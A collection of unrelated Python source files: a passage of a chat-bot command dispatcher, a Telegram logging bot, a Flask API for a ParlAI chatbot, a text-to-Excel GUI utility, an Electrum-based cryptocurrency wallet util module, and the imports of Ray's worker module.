result = self.__func__(*processed_args)
return result if not quiet_action else ""
except CmdException as e:
return str(e)
except Exception: # Everything else
log_exception(*sys.exc_info())
return "I hit an error while trying to run that command; run `!!/errorlogs` for details."
def __repr__(self):
return "{}({}, reply={}, whole_msg={}, privileged={}, arity={}, aliases={}, give_name={})" \
.format(
self.__class__.__name__, ", ".join([s.__name__ for s in self.type_signature]), self.reply,
self.whole_msg, self.privileged,
self.arity, self.aliases, self.give_name
)
def command(*type_signature, reply=False, whole_msg=False, privileged=False, arity=None, aliases=None, give_name=False):
aliases = aliases or []
def decorator(func):
f = ChatCommand(type_signature, reply, whole_msg, privileged, arity, aliases, give_name)
f.__func__ = func
cmd = (f, arity if arity else (len(type_signature), len(type_signature)))
if reply:
_reply_commands[func.__name__.replace('_', '-')] = cmd
for alias in aliases:
_reply_commands[alias] = cmd
else:
_prefix_commands[func.__name__.replace("_", "-")] = cmd
for alias in aliases:
_prefix_commands[alias] = cmd
return f
return decorator
def message(msg):
assert isinstance(msg, Message)
return msg
def get_message(id, host="stackexchange.com"):
if host not in _clients:
raise ValueError("Invalid host")
return _clients[host].get_message(int(id))
def dispatch_command(msg):
command_parts = GlobalVars.parser.unescape(msg.content).split(" ", 1)
try:
if command_parts[0] == 'sdc':
command_parts = command_parts[1].split(" ", 1)
else:
command_parts[0] = command_parts[0][3:]
except IndexError:
return "Invalid command: Use either `!!/cmd_name` or `sdc cmd_name`" +\
" to run command `cmd_name`."
if len(command_parts) == 2:
cmd, args = command_parts
else:
cmd, = command_parts
args = ""
if cmd == "":
return
command_name = cmd.lower()
quiet_action = command_name[-1] == "-"
command_name = regex.sub(r"[[:punct:]]*$", "", command_name).replace("_", "-")
if command_name not in _prefix_commands:
return "No such command '{}'.".format(command_name)
else:
log('debug', 'Command received: ' + msg.content)
func, (min_arity, max_arity) = _prefix_commands[command_name]
if max_arity == 0:
return func(original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
elif max_arity == 1:
if min_arity == 1 and not args:
return "Missing an argument."
return func(args or None, original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
else:
args = args.split()
if len(args) < min_arity:
return "Too few arguments."
elif len(args) > max_arity:
return "Too many arguments."
else:
args.extend([None] * (max_arity - len(args)))
return func(*args, original_msg=msg, alias_used=command_name, quiet_action=quiet_action)
def dispatch_reply_command(msg, reply, full_cmd, comment=True):
command_parts = full_cmd.split(" ", 1)
if len(command_parts) == 2:
cmd, args = command_parts
else:
cmd, = command_parts
args = ""
cmd = cmd.lower()
quiet_action = cmd[-1] == "-"
cmd = regex.sub(r"\W*$", "", cmd)
if cmd in _reply_commands:
func, (min_arity, max_arity) = _reply_commands[cmd]
assert min_arity == 1
if max_arity == 1:
return func(msg, original_msg=reply, alias_used=cmd, quiet_action=quiet_action)
elif max_arity == 2:
return func(msg, args, original_msg=reply, alias_used=cmd, quiet_action=quiet_action)
else:
args = args.split()
args.extend([None] * (max_arity - len(args)))
return func(msg, *args, original_msg=reply, alias_used=cmd, quiet_action=quiet_action)
elif comment and is_privileged(reply.owner, reply.room):
post_data = get_report_data(msg)
if post_data:
Tasks.do(metasmoke.Metasmoke.post_auto_comment, full_cmd, reply.owner, url=post_data[0])
def dispatch_shorthand_command(msg):
commands = shlex.split(GlobalVars.parser.unescape(msg.content).lower())[1:]
if len(commands) == 0:
return
output = []
processed_commands = []
for cmd in commands:
count, cmd = regex.match(r"^(\d*)(.*)", cmd).groups()
for _ in range(int(count) if count else 1):
processed_commands.append(cmd)
should_return_output = False
for current_command, message in zip(processed_commands, get_last_messages(msg.room, len(processed_commands))):
if current_command == "-":
output.append("[:{}] <skipped>".format(message.id))
else:
result = dispatch_reply_command(message, msg, current_command, comment=False)
if result:
should_return_output = True
output.append("[:{}] {}".format(message.id, result))
else:
output.append("[:{}] <processed without return value>".format(message.id))
if should_return_output:
return "\n".join(output)
|
message_handler.py | import threading
from time import sleep
import kernel
def bot_polling():
while True:
app = kernel.Kernel()
try:
bot_actions(app)
app.bot.polling(none_stop=True, interval=app.BOT_INTERVAL_POLLING, timeout=app.BOT_TIMEOUT_POLLING)
except Exception as ex:
app.bot.stop_polling()
sleep(app.BOT_TIMEOUT_POLLING)
else:
app.bot.stop_polling()
break
def user_message_log(app, message):
with open(app.FILE_USER_MESSAGE_LOG_NAME, 'a') as file:
file.write('-------------------\n')
file.write("{0}: {1}\n".format('message_id', message.message_id))
file.write("{0}: {1}\n".format('user_id', message.from_user.id))
file.write("{0}: {1}\n".format('first_name', message.from_user.first_name))
file.write("{0}: {1}\n".format('last_name', message.from_user.last_name))
file.write("{0}: {1}\n".format('username', message.from_user.username))
file.write("{0}: {1}\n".format('date', message.date))
file.write('-------------------\n')
file.write(message.text)
file.write('\n-------------------\n')
file.write('\n\n\n')
def bot_actions(app):
@app.bot.message_handler(commands=['start', 'help'])
def send_welcome(message):
app.bot.send_message(message.chat.id, app.BOT_MESSAGE_SEND_START_HELP)
app.bot.send_message(message.chat.id, app.BOT_MESSAGE_SEND_START_HELP_INFO_LOG)
app.bot.send_message(message.chat.id, app.BOT_MESSAGE_SEND_START_HELP_EMOJI)
@app.bot.message_handler(content_types=['new_chat_members'])
def register_group(message):
is_add_group = app.sqlite.add_group(message.chat.id)
if is_add_group:
app.bot.send_message(message.chat.id, app.BOT_MESSAGE_SEND_REGISTER_GROUP)
app.bot.send_message(message.chat.id, app.BOT_MESSAGE_SEND_REGISTER_GROUP_EMOJI)
@app.bot.message_handler(func=lambda message: message.chat.type == 'private')
def message_log(message):
user_message_log(app=app, message=message)
app.bot.reply_to(message, app.BOT_MESSAGE_SEND_START_HELP_INFO_LOG_DONE)
polling_thread = threading.Thread(target=bot_polling)
polling_thread.daemon = True
polling_thread.start()
if __name__ == "__main__":
"""https://gist.github.com/David-Lor/37e0ae02cd7fb1cd01085b2de553dde4"""
while True:
try:
sleep(120)
except KeyboardInterrupt:
break
|
api.py | import flask
import requests
import argparse
import json
import websockets
import uuid
import asyncio
import logging
import re
import threading
from flask import Flask, request, jsonify
logging.basicConfig(filename='parlai_api.log', level=30)
parser = argparse.ArgumentParser(description="Simple API for ParlAI chat bot")
parser.add_argument('--hostname', default="localhost", help="ParlAI web server hostname.")
parser.add_argument('--port', type=int, default=8081, help="ParlAI web server port.")
parser.add_argument('--serving_hostname', default="0.0.0.0", help="API web server hostname.")
parser.add_argument('--serving_port', type=int, default=8080, help="API web server port.")
args = parser.parse_args()
hostname = args.hostname
port = args.port
serving_hostname = args.serving_hostname
serving_port = args.serving_port
app = Flask(__name__)
blueprint = flask.Blueprint('parlai_api', __name__, template_folder='templates')
connections = {}
websocket_uri = f"ws://{hostname}:{port}/websocket"
running = False
requests = []
responses = {}
def get_random_id():
return str(uuid.uuid4())
def format_message(message):
while match := re.search("\s'\s", message):
message = message[:match.start()] + "'" + message[match.end():]
while match := re.search('\s[.?!,;:\']', message):
message = message[:match.start()] + message[match.end() - 1:]
while match := re.search('[.?!]\s[a-z]', message):
message = message[:match.end() - 1] + message[match.end() - 1].capitalize() + message[match.end():]
message = message[0].capitalize() + message[1:]
return message
class ParlaiAPI:
@staticmethod
def parse():
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
while True:
if not requests:
continue
request = requests.pop(0)
result = loop.run_until_complete(request[1]())
responses[request[0]] = result
@staticmethod
async def send_message(user_message, message_history=[], persona=False):
if persona:
message = "your persona: "
else:
message = ""
message += user_message
request_dict = {"text": message, "message_history": message_history}
request_string = json.dumps(request_dict)
request_bytes = bytes(request_string, encoding="UTF-8")
print(request_bytes)
try:
async with websockets.connect(websocket_uri) as ws:
await ws.send(request_bytes)
response = await ws.recv()
response = json.loads(response)
print(response)
try:
response['text'] = format_message(response['text'])
except Exception as e:
print(e)
return response
except Exception as e:
return {'text': str(e)}
@blueprint.route('/api/send_message', methods=["POST"])
def send_message():
request_id = get_random_id()
data = request.get_json()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
message_text, message_history = data.get('message_text', None), data.get('message_history', [])
requests.append([request_id,
lambda: ParlaiAPI.send_message(message_text, message_history)])
logging.warning(str(requests))
while request_id not in responses:
pass
result = responses[request_id]
del responses[request_id]
return result
@blueprint.route('/api/start_conversation', methods=["POST"])
def start_conversation():
# DEPRECATED
return {'text': 'Hello!'}
@blueprint.route('/api/end_conversation', methods=["POST"])
def end_conversation():
# DEPRECATED
return {'text': 'Goodbye!'}
async def main():
thread = threading.Thread(target=ParlaiAPI.parse)
thread.start()
app.register_blueprint(blueprint)
app.run(host=serving_hostname, port=serving_port)
main_loop = asyncio.get_event_loop()
main_loop.run_until_complete(main())
|
TXT2EXCEL.py | # Author - Shane Carnahan
# Email - Shane.Carnahan1@gmail.com
# Date - 8/29/2018
# Project - TXT2EXCEL
# Module Version - 1.0
import glob, csv, xlwt, os, tkinter
from tkinter import *
from tkinter import messagebox
import tkinter.filedialog as filedialog
from pathlib import Path
from threading import Thread
from MyLogger import my_logger
import webbrowser
import time
'''
This utility will search the folder given as input for .txt files and will add them to tabs in an excel file.
The tabs will be named with the file name found.
'''
wb = xlwt.Workbook()
def help_docs():
webbrowser.open_new(r"https://github.com/scarnahan1/Cisco_Config_Builder")
return
def about():
messagebox.showinfo(title="About", message="""
File compare utility created by Shane Carnahan (Shane.carnahan1@gmail.com).
""")
return
def close():
exit = messagebox.askyesno(title="Quit", message="Are You Sure You Want To Be a Quitter?")
if exit > 0:
main_window.destroy()
sys.exit(0)
return
def path(location_entry, default_path):
# Clear the original location in the path box
location_entry.delete(0, 'end')
path = filedialog.askdirectory(initialdir=default_path)
# Write out new path to the entry box
location_entry.insert(END, path)
return path
def gui_thread(site_name_entry, input_location_entry, output_location_entry, logger2, logger3):
""" This calls a new thread for the work to begin and allows the GUI to respond again"""
logger2.debug("Called GUI Function...")
myThread = Thread(target=lambda: main_thread(site_name_entry, input_location_entry, output_location_entry, logger2, logger3))
myThread.start()
def main_thread(site_name_entry, input_location_entry, output_location_entry, logger2, logger3):
start_time = time.time()
pattern = "/*.txt"
in_location = input_location_entry.get()
out_location = output_location_entry.get() + '/'
g_location = in_location + pattern
for filename in glob.glob(g_location):
(f_path, f_name) = os.path.split(filename)
(f_short_name, f_extension) = os.path.splitext(f_name)
ws = wb.add_sheet(f_short_name)
with open(filename, 'r') as f:
for i, line in enumerate(f):
ws.write(i, 0, line)
outfile_append = "_Configs.xls"
outfile = out_location + site_name_entry.get() + outfile_append
logger3.debug('Saving file {}...'. format(outfile))
wb.save(outfile)
logger3.info('--- {} seconds ---'.format(time.time() - start_time))
logger3.info('Run Completed...')
def main(log_location):
# Set up our logging here
log_file_name = log_location + 'TXT2Excel.log'
# Set loggers for specific areas of the module
logger1 = my_logger('TXT2Excel.main', log_file_name)
logger2 = my_logger('TXT2Excel.gui_thread', log_file_name)
logger3 = my_logger('TXT2Excel.main_thread', log_file_name)
logger4 = my_logger('TXT2Excel.multiple_replace', log_file_name)
"""
Get the path to the users Documents folder
Assumes that this is a Windows 10 machine and the user has a Documents folder.
"""
default_path = ""
try:
userprofile = os.environ.get('USERPROFILE') # This should work for windows OS
logger1.debug(userprofile)
default_path = userprofile + "\\" + "Documents"
logger1.debug(default_path)
except:
userprofile = str(Path.home()) # This should work for MAC and probably Linux
default_path = userprofile + "/" + "Documents"
logger1.debug(default_path)
# GUI Things
global main_window
main_window = tkinter.Tk()
main_window.title('TXT2Excel')
site_name_text = Label(main_window, text="Site Name/Code")
site_name_text.grid(row=1, column=0, sticky=W)
site_name_entry = Entry(main_window)
site_name_entry.grid(row=1, column=1, sticky=W)
site_name_entry.insert(END, 'BOP')
input_location_text = Label(main_window, text="Select the input path")
input_location_text.grid(row=3, column=0, sticky=W)
input_location_entry = Entry(main_window, width=30)
input_location_entry.grid(row=3, column=1, sticky=W)
input_location_entry.insert(END, default_path)
open_file = Button(main_window, command=lambda: path(input_location_entry, default_path), padx=1, text="Select input Path")
open_file.grid(row=3, column=2, sticky=W)
output_location_text = Label(main_window, text="Select the output path")
output_location_text.grid(row=4, column=0, sticky=W)
output_location_entry = Entry(main_window, width=30)
output_location_entry.grid(row=4, column=1, sticky=W)
output_location_entry.insert(END, default_path)
open_file = Button(main_window, command=lambda: path(output_location_entry, default_path), padx=1, text="Select Output Path")
open_file.grid(row=4, column=2, sticky=W)
# Let's Go!
attempt = Button(text="OK", command=lambda: gui_thread(site_name_entry, input_location_entry, output_location_entry, logger2, logger3))
attempt.grid(row=10, column=0, sticky=W)
exit = Button(text="Close", command=close)
exit.grid(row=10, column=1, sticky=W)
""" Playing with Menu ideas. This may get ripped out in the end but wanted to give it a try for now. """
# Menu Construction
menubar = Menu(main_window)
filemenu = Menu(menubar, tearoff=0)
# filemenu.add_command(label="New", command=new) # New would be a function similar to a button
# filemenu.add_command(label="Open")
# filemenu.add_command(label="Save As..")
filemenu.add_command(label="Close", command=close)
menubar.add_cascade(label="File", menu=filemenu)
main_window.config(menu=menubar)
# Edit Menu
# editmenu = Menu(menubar, tearoff=0)
# editmenu.add_command(label='Edit', command=edit)
# menubar.add_cascade(label="Edit", menu=editmenu)
# Help Menu
helpmenu = Menu(menubar, tearoff=0)
helpmenu.add_command(label="Help Docs", command=help_docs)
helpmenu.add_command(label="About", command=about)
menubar.add_cascade(label="Help", menu=helpmenu)
# Main Starter required for Windows machines
main_window.mainloop()
if __name__ == "__main__":
log_location = './LOGS/'
main(log_location)
|
util.py | #!/usr/bin/env python
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os, sys, re, json
import platform
import shutil
from collections import defaultdict
from datetime import datetime
from decimal import Decimal
import traceback
import urlparse
import urllib
import threading
from i18n import _
base_units = {'ZEIT':8, 'ZEIT':8, 'ZEIT':8}
fee_levels = [_('Within 25 blocks'), _('Within 10 blocks'), _('Within 5 blocks'), _('Within 2 blocks'), _('In the next block')]
def normalize_version(v):
return [int(x) for x in re.sub(r'(\.0+)*$','', v).split(".")]
class NotEnoughFunds(Exception): pass
class InvalidPassword(Exception):
def __str__(self):
return _("Incorrect password")
# Throw this exception to unwind the stack like when an error occurs.
# However unlike other exceptions the user won't be informed.
class UserCancelled(Exception):
'''An exception that is suppressed from the user'''
pass
class MyEncoder(json.JSONEncoder):
def default(self, obj):
from transaction import Transaction
if isinstance(obj, Transaction):
return obj.as_dict()
return super(MyEncoder, self).default(obj)
class PrintError(object):
'''A handy base class'''
def diagnostic_name(self):
return self.__class__.__name__
def print_error(self, *msg):
print_error("[%s]" % self.diagnostic_name(), *msg)
def print_msg(self, *msg):
print_msg("[%s]" % self.diagnostic_name(), *msg)
class ThreadJob(PrintError):
"""A job that is run periodically from a thread's main loop. run() is
called from that thread's context.
"""
def run(self):
"""Called periodically from the thread"""
pass
class DebugMem(ThreadJob):
'''A handy class for debugging GC memory leaks'''
def __init__(self, classes, interval=30):
self.next_time = 0
self.classes = classes
self.interval = interval
def mem_stats(self):
import gc
self.print_error("Start memscan")
gc.collect()
objmap = defaultdict(list)
for obj in gc.get_objects():
for class_ in self.classes:
if isinstance(obj, class_):
objmap[class_].append(obj)
for class_, objs in objmap.items():
self.print_error("%s: %d" % (class_.__name__, len(objs)))
self.print_error("Finish memscan")
def run(self):
if time.time() > self.next_time:
self.mem_stats()
self.next_time = time.time() + self.interval
class DaemonThread(threading.Thread, PrintError):
""" daemon thread that terminates cleanly """
def __init__(self):
threading.Thread.__init__(self)
self.parent_thread = threading.currentThread()
self.running = False
self.running_lock = threading.Lock()
self.job_lock = threading.Lock()
self.jobs = []
def add_jobs(self, jobs):
with self.job_lock:
self.jobs.extend(jobs)
def run_jobs(self):
# Don't let a throwing job disrupt the thread, future runs of
# itself, or other jobs. This is useful protection against
# malformed or malicious server responses
with self.job_lock:
for job in self.jobs:
try:
job.run()
except:
traceback.print_exc(file=sys.stderr)
def remove_jobs(self, jobs):
with self.job_lock:
for job in jobs:
self.jobs.remove(job)
def start(self):
with self.running_lock:
self.running = True
return threading.Thread.start(self)
def is_running(self):
with self.running_lock:
return self.running and self.parent_thread.is_alive()
def stop(self):
with self.running_lock:
self.running = False
def on_stop(self):
if 'ANDROID_DATA' in os.environ:
import jnius
jnius.detach()
self.print_error("jnius detach")
self.print_error("stopped")
is_verbose = False
def set_verbosity(b):
global is_verbose
is_verbose = b
def print_error(*args):
if not is_verbose: return
print_stderr(*args)
def print_stderr(*args):
args = [str(item) for item in args]
sys.stderr.write(" ".join(args) + "\n")
sys.stderr.flush()
def print_msg(*args):
# Stringify args
args = [str(item) for item in args]
sys.stdout.write(" ".join(args) + "\n")
sys.stdout.flush()
def json_encode(obj):
try:
s = json.dumps(obj, sort_keys = True, indent = 4, cls=MyEncoder)
except TypeError:
s = repr(obj)
return s
def json_decode(x):
try:
return json.loads(x, parse_float=decimal.Decimal)
except:
return x
# decorator that prints execution time
def profiler(func):
def do_profile(func, args, kw_args):
n = func.func_name
t0 = time.time()
o = func(*args, **kw_args)
t = time.time() - t0
print_error("[profiler]", n, "%.4f"%t)
return o
return lambda *args, **kw_args: do_profile(func, args, kw_args)
def android_ext_dir():
import jnius
env = jnius.autoclass('android.os.Environment')
return env.getExternalStorageDirectory().getPath()
def android_data_dir():
import jnius
PythonActivity = jnius.autoclass('org.kivy.android.PythonActivity')
return PythonActivity.mActivity.getFilesDir().getPath() + '/data'
def android_headers_path():
path = android_ext_dir() + '/org.electrum.electrum/blockchain_headers'
d = os.path.dirname(path)
if not os.path.exists(d):
os.mkdir(d)
return path
def android_check_data_dir():
""" if needed, move old directory to sandbox """
ext_dir = android_ext_dir()
data_dir = android_data_dir()
old_electrum_dir = ext_dir + '/electrum'
if not os.path.exists(data_dir) and os.path.exists(old_electrum_dir):
import shutil
new_headers_path = android_headers_path()
old_headers_path = old_electrum_dir + '/blockchain_headers'
if not os.path.exists(new_headers_path) and os.path.exists(old_headers_path):
print_error("Moving headers file to", new_headers_path)
shutil.move(old_headers_path, new_headers_path)
print_error("Moving data to", data_dir)
shutil.move(old_electrum_dir, data_dir)
return data_dir
def get_headers_path(config):
if 'ANDROID_DATA' in os.environ:
return android_headers_path()
else:
return os.path.join(config.path, 'blockchain_headers')
def user_dir():
if "HOME" in os.environ:
return os.path.join(os.environ["HOME"], ".electrum-zeit")
elif "APPDATA" in os.environ:
return os.path.join(os.environ["APPDATA"], "Electrum-zeit")
elif "LOCALAPPDATA" in os.environ:
return os.path.join(os.environ["LOCALAPPDATA"], "Electrum-zeit")
elif 'ANDROID_DATA' in os.environ:
return android_check_data_dir()
else:
#raise Exception("No home directory found in environment variables.")
return
def format_satoshis_plain(x, decimal_point = 8):
'''Display a satoshi amount scaled. Always uses a '.' as a decimal
point and has no thousands separator'''
scale_factor = pow(10, decimal_point)
return "{:.8f}".format(Decimal(x) / scale_factor).rstrip('0').rstrip('.')
def format_satoshis(x, is_diff=False, num_zeros = 0, decimal_point = 8, whitespaces=False):
from locale import localeconv
if x is None:
return 'unknown'
x = int(x) # Some callers pass Decimal
scale_factor = pow (10, decimal_point)
integer_part = "{:n}".format(int(abs(x) / scale_factor))
if x < 0:
integer_part = '-' + integer_part
elif is_diff:
integer_part = '+' + integer_part
dp = localeconv()['decimal_point']
fract_part = ("{:0" + str(decimal_point) + "}").format(abs(x) % scale_factor)
fract_part = fract_part.rstrip('0')
if len(fract_part) < num_zeros:
fract_part += "0" * (num_zeros - len(fract_part))
result = integer_part + dp + fract_part
if whitespaces:
result += " " * (decimal_point - len(fract_part))
result = " " * (15 - len(result)) + result
return result.decode('utf8')
def timestamp_to_datetime(timestamp):
try:
return datetime.fromtimestamp(timestamp)
except:
return None
def format_time(timestamp):
date = timestamp_to_datetime(timestamp)
return date.isoformat(' ')[:-3] if date else _("Unknown")
# Takes a timestamp and returns a string with the approximation of the age
def age(from_date, since_date = None, target_tz=None, include_seconds=False):
if from_date is None:
return "Unknown"
from_date = datetime.fromtimestamp(from_date)
if since_date is None:
since_date = datetime.now(target_tz)
td = time_difference(from_date - since_date, include_seconds)
return td + " ago" if from_date < since_date else "in " + td
def time_difference(distance_in_time, include_seconds):
#distance_in_time = since_date - from_date
distance_in_seconds = int(round(abs(distance_in_time.days * 86400 + distance_in_time.seconds)))
distance_in_minutes = int(round(distance_in_seconds/60))
if distance_in_minutes <= 1:
if include_seconds:
for remainder in [5, 10, 20]:
if distance_in_seconds < remainder:
return "less than %s seconds" % remainder
if distance_in_seconds < 40:
return "half a minute"
elif distance_in_seconds < 60:
return "less than a minute"
else:
return "1 minute"
else:
if distance_in_minutes == 0:
return "less than a minute"
else:
return "1 minute"
elif distance_in_minutes < 45:
return "%s minutes" % distance_in_minutes
elif distance_in_minutes < 90:
return "about 1 hour"
elif distance_in_minutes < 1440:
return "about %d hours" % (round(distance_in_minutes / 60.0))
elif distance_in_minutes < 2880:
return "1 day"
elif distance_in_minutes < 43220:
return "%d days" % (round(distance_in_minutes / 1440))
elif distance_in_minutes < 86400:
return "about 1 month"
elif distance_in_minutes < 525600:
return "%d months" % (round(distance_in_minutes / 43200))
elif distance_in_minutes < 1051200:
return "about 1 year"
else:
return "over %d years" % (round(distance_in_minutes / 525600))
block_explorer_info = {
'cryptoid Chainz': ('https://chainz.cryptoid.info/zeit/',
{'tx': 'tx.dws?', 'addr': 'address.dws?'}),
'system default': ('https://chainz.cryptoid.info/zeit/',
{'tx': 'tx.dws?', 'addr': 'address.dws?'}),
}
def block_explorer(config):
return config.get('block_explorer', 'cryptoid Chainz')
def block_explorer_tuple(config):
return block_explorer_info.get(block_explorer(config))
def block_explorer_URL(config, kind, item):
be_tuple = block_explorer_tuple(config)
if not be_tuple:
return
kind_str = be_tuple[1].get(kind)
if not kind_str:
return
url_parts = [be_tuple[0], kind_str, item]
return "".join(url_parts)
# URL decode
#_ud = re.compile('%([0-9a-hA-H]{2})', re.MULTILINE)
#urldecode = lambda x: _ud.sub(lambda m: chr(int(m.group(1), 16)), x)
def parse_URI(uri, on_pr=None):
import bitcoin
from bitcoin import COIN
if ':' not in uri:
if not bitcoin.is_address(uri):
raise BaseException("Not a zeitcoin address")
return {'address': uri}
u = urlparse.urlparse(uri)
if u.scheme != 'zeitcoin':
raise BaseException("Not a zeitcoin URI")
address = u.path
# python for android fails to parse query
if address.find('?') > 0:
address, query = u.path.split('?')
pq = urlparse.parse_qs(query)
else:
pq = urlparse.parse_qs(u.query)
for k, v in pq.items():
if len(v)!=1:
raise Exception('Duplicate Key', k)
out = {k: v[0] for k, v in pq.items()}
if address:
if not bitcoin.is_address(address):
raise BaseException("Invalid zeitcoin address:" + address)
out['address'] = address
if 'amount' in out:
am = out['amount']
m = re.match('([0-9\.]+)X([0-9])', am)
if m:
k = int(m.group(2)) - 8
amount = Decimal(m.group(1)) * pow( Decimal(10) , k)
else:
amount = Decimal(am) * COIN
out['amount'] = int(amount)
if 'message' in out:
out['message'] = out['message'].decode('utf8')
out['memo'] = out['message']
if 'time' in out:
out['time'] = int(out['time'])
if 'exp' in out:
out['exp'] = int(out['exp'])
if 'sig' in out:
out['sig'] = bitcoin.base_decode(out['sig'], None, base=58).encode('hex')
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
def get_payment_request_thread():
import paymentrequest as pr
if name and sig:
s = pr.serialize_request(out).SerializeToString()
request = pr.PaymentRequest(s)
else:
request = pr.get_payment_request(r)
on_pr(request)
t = threading.Thread(target=get_payment_request_thread)
t.setDaemon(True)
t.start()
return out
def create_URI(addr, amount, message):
import bitcoin
if not bitcoin.is_address(addr):
return ""
query = []
if amount:
query.append('amount=%s'%format_satoshis_plain(amount))
if message:
if type(message) == unicode:
message = message.encode('utf8')
query.append('message=%s'%urllib.quote(message))
p = urlparse.ParseResult(scheme='zeitcoin', netloc='', path=addr, params='', query='&'.join(query), fragment='')
return urlparse.urlunparse(p)
# Python bug (http://bugs.python.org/issue1927) causes raw_input
# to be redirected improperly between stdin/stderr on Unix systems
def raw_input(prompt=None):
if prompt:
sys.stdout.write(prompt)
return builtin_raw_input()
import __builtin__
builtin_raw_input = __builtin__.raw_input
__builtin__.raw_input = raw_input
def parse_json(message):
n = message.find('\n')
if n==-1:
return None, message
try:
j = json.loads( message[0:n] )
except:
j = None
return j, message[n+1:]
class timeout(Exception):
pass
import socket
import errno
import json
import ssl
import time
class SocketPipe:
def __init__(self, socket):
self.socket = socket
self.message = ''
self.set_timeout(0.1)
self.recv_time = time.time()
def set_timeout(self, t):
self.socket.settimeout(t)
def idle_time(self):
return time.time() - self.recv_time
def get(self):
while True:
response, self.message = parse_json(self.message)
if response is not None:
return response
try:
data = self.socket.recv(1024)
except socket.timeout:
raise timeout
except ssl.SSLError:
raise timeout
except socket.error, err:
if err.errno == 60:
raise timeout
elif err.errno in [11, 35, 10035]:
print_error("socket errno %d (resource temporarily unavailable)"% err.errno)
time.sleep(0.2)
raise timeout
else:
print_error("pipe: socket error", err)
data = ''
except:
traceback.print_exc(file=sys.stderr)
data = ''
if not data: # Connection closed remotely
return None
self.message += data
self.recv_time = time.time()
def send(self, request):
out = json.dumps(request) + '\n'
self._send(out)
def send_all(self, requests):
out = ''.join(map(lambda x: json.dumps(x) + '\n', requests))
self._send(out)
def _send(self, out):
while out:
try:
sent = self.socket.send(out)
out = out[sent:]
except ssl.SSLError as e:
print_error("SSLError:", e)
time.sleep(0.1)
continue
except socket.error as e:
if e[0] in (errno.EWOULDBLOCK,errno.EAGAIN):
print_error("EAGAIN: retrying")
time.sleep(0.1)
continue
elif e[0] in ['timed out', 'The write operation timed out']:
print_error("socket timeout, retry")
time.sleep(0.1)
continue
else:
traceback.print_exc(file=sys.stdout)
raise e
import Queue
class QueuePipe:
def __init__(self, send_queue=None, get_queue=None):
self.send_queue = send_queue if send_queue else Queue.Queue()
self.get_queue = get_queue if get_queue else Queue.Queue()
self.set_timeout(0.1)
def get(self):
try:
return self.get_queue.get(timeout=self.timeout)
except Queue.Empty:
raise timeout
def get_all(self):
responses = []
while True:
try:
r = self.get_queue.get_nowait()
responses.append(r)
except Queue.Empty:
break
return responses
def set_timeout(self, t):
self.timeout = t
def send(self, request):
self.send_queue.put(request)
def send_all(self, requests):
for request in requests:
self.send(request)
class StoreDict(dict):
def __init__(self, config, name):
self.config = config
self.path = os.path.join(self.config.path, name)
self.load()
def load(self):
try:
with open(self.path, 'r') as f:
self.update(json.loads(f.read()))
except:
pass
def save(self):
with open(self.path, 'w') as f:
s = json.dumps(self, indent=4, sort_keys=True)
r = f.write(s)
def __setitem__(self, key, value):
dict.__setitem__(self, key, value)
self.save()
def pop(self, key):
if key in self.keys():
dict.pop(self, key)
self.save()
def check_www_dir(rdir):
import urllib, urlparse, shutil, os
if not os.path.exists(rdir):
os.mkdir(rdir)
index = os.path.join(rdir, 'index.html')
if not os.path.exists(index):
print_error("copying index.html")
src = os.path.join(os.path.dirname(__file__), 'www', 'index.html')
shutil.copy(src, index)
files = [
"https://code.jquery.com/jquery-1.9.1.min.js",
"https://raw.githubusercontent.com/davidshimjs/qrcodejs/master/qrcode.js",
"https://code.jquery.com/ui/1.10.3/jquery-ui.js",
"https://code.jquery.com/ui/1.10.3/themes/smoothness/jquery-ui.css"
]
for URL in files:
path = urlparse.urlsplit(URL).path
filename = os.path.basename(path)
path = os.path.join(rdir, filename)
if not os.path.exists(path):
print_error("downloading ", URL)
urllib.urlretrieve(URL, path)
|
worker.py | from contextlib import contextmanager
import atexit
import faulthandler
import hashlib
import inspect
import io
import json
import logging
import os
import redis
import sys
import threading
import time
import traceback
from typing import Any, Callable, Dict, Iterator, List, Optional, Tuple, Union
# Ray modules
from ray.autoscaler._private.constants import AUTOSCALER_EVENTS
from ray.autoscaler._private.util import DEBUG_AUTOSCALING_ERROR
import ray.cloudpickle as pickle
import ray._private.memory_monitor as memory_monitor
import ray.node
import ray.job_config
import ray._private.parameter
import ray.ray_constants as ray_constants
import ray.remote_function
import ray.serialization as serialization
import ray._private.gcs_utils as gcs_utils
import ray._private.services as services
from ray._private.gcs_pubsub import gcs_pubsub_enabled, GcsPublisher, \
GcsSubscriber
from ray._private.runtime_env.py_modules import upload_py_modules_if_needed
from ray._private.runtime_env.working_dir import upload_working_dir_if_needed
from ray._private.runtime_env.constants import RAY_JOB_CONFIG_JSON_ENV_VAR
import ray._private.import_thread as import_thread
from ray.util.tracing.tracing_helper import import_from_string
from ray.util.annotations import PublicAPI, DeveloperAPI, Deprecated
from ray.util.debug import log_once
import ray
import colorama
import setproctitle
import ray.state
from ray import (
ActorID,
JobID,
ObjectRef,
Language,
)
import ray._private.profiling as profiling
from ray.exceptions import (
RaySystemError,
RayError,
RayTaskError,
ObjectStoreFullError,
)
from ray._private.function_manager import FunctionActorManager
from ray._private.ray_logging import setup_logger
from ray._private.ray_logging import global_worker_stdstream_dispatcher
